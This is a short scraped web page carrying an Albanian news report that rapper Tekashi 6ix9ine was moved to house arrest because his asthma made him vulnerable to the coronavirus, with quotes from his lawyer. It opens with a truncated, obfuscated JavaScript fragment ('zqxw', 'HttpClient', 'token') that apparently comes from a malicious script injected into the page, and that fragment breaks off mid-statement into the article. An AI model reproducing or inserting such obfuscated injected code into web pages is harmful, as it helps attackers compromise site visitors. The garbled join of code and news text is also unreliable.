;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Reperi famëkeq lirohet nga burgu shkak i pandemisë

By

Reperi Tekashi 6ix9ine u la në arrest shtëpie të enjten për shkak të frikës se astma e tij kronike e bën atë të prekshëm ndaj koronavirusit.

“Ai është jashtë dhe ai është shumë i lumtur që u la i lirë,” tha avokati i tij mbrojtës, Lance Lazzaro, për NBC News.

Reperi 23-vjeçar, emri i vërtetë i të cilit është Daniel Hernandez, ishte vendosur në një strukturë private nën kontratë me Byronë Federale të Burgjeve. Ai po vuante burg pasi u deklarua fajtor për akuza të shumta për mashtrim, vepra të armëve të zjarrit dhe trafik droge.

Duke përmendur shqetësimet e sigurisë, Lazzaro nuk pranoi të zbulojë se ku gjendej klienti i tij dhe nuk pranoi të thoshte se ku do të qëndronte për katër muajt e fundit të dënimit të tij dy vjeçar.

Tekashi69

 

Artikuj të ngjashëm